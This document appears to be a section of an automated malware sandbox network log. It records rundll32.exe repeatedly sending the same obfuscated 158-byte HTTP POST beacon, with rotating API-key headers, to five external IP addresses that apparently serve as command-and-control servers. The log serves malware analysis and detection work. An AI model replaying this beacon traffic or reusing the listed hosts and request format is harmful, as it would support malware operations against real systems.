Jul 16, 2024 09:54:48.454646111 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: MPr4xJFN Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:54:49.254353046 CEST	165	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:54:49 GMT Content-Length: 1 Data Raw: 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49738	195.2.70.38	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:54.059849977 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 2FVnYUYi Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49739	91.142.74.28	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:55.809115887 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: aCaMRXY2 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49740	77.238.224.56	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:57.540714025 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: lcfnoL29 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49741	77.238.229.63	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:59.172420979 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: H7WUfhwB Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49742	77.238.250.123	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:00.779757023 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: DgailfSo Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:55:01.736356974 CEST	165	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:55:01 GMT Content-Length: 1 Data Raw: 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49743	195.2.70.38	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:19.271378994 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: I0k7Og48 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49744	91.142.74.28	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:21.032908916 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: TqNGyDeX Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49745	77.238.224.56	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:22.796713114 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: YErevdY1 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49746	77.238.229.63	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:24.403855085 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: EqBoIlXt Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49747	77.238.250.123	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:26.016721010 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: DoOHTipa Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:55:26.830532074 CEST	165	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:55:26 GMT Content-Length: 1 Data Raw: 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49748	195.2.70.38	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:31.755283117 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: WswKg4zp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49749	91.142.74.28	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:33.517997980 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Llo5yKDO Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49750	77.238.224.56	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:35.264590979 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: kiDhxg7x Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49751	77.238.229.63	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:36.904926062 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 8PYrLl61 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49752	77.238.250.123	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:38.599669933 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: BTs1kB79 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:55:39.196434021 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:55:39 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49753	195.2.70.38	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:56.857707977 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: XYCYQ57h Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49754	91.142.74.28	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:55:58.630242109 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: U7DXQswp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49755	77.238.224.56	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:00.374753952 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: dz6yzA6N Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49756	77.238.229.63	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:02.068783998 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 80vxCJMB Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49757	77.238.250.123	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:03.716655016 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: lBtwWmVd Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
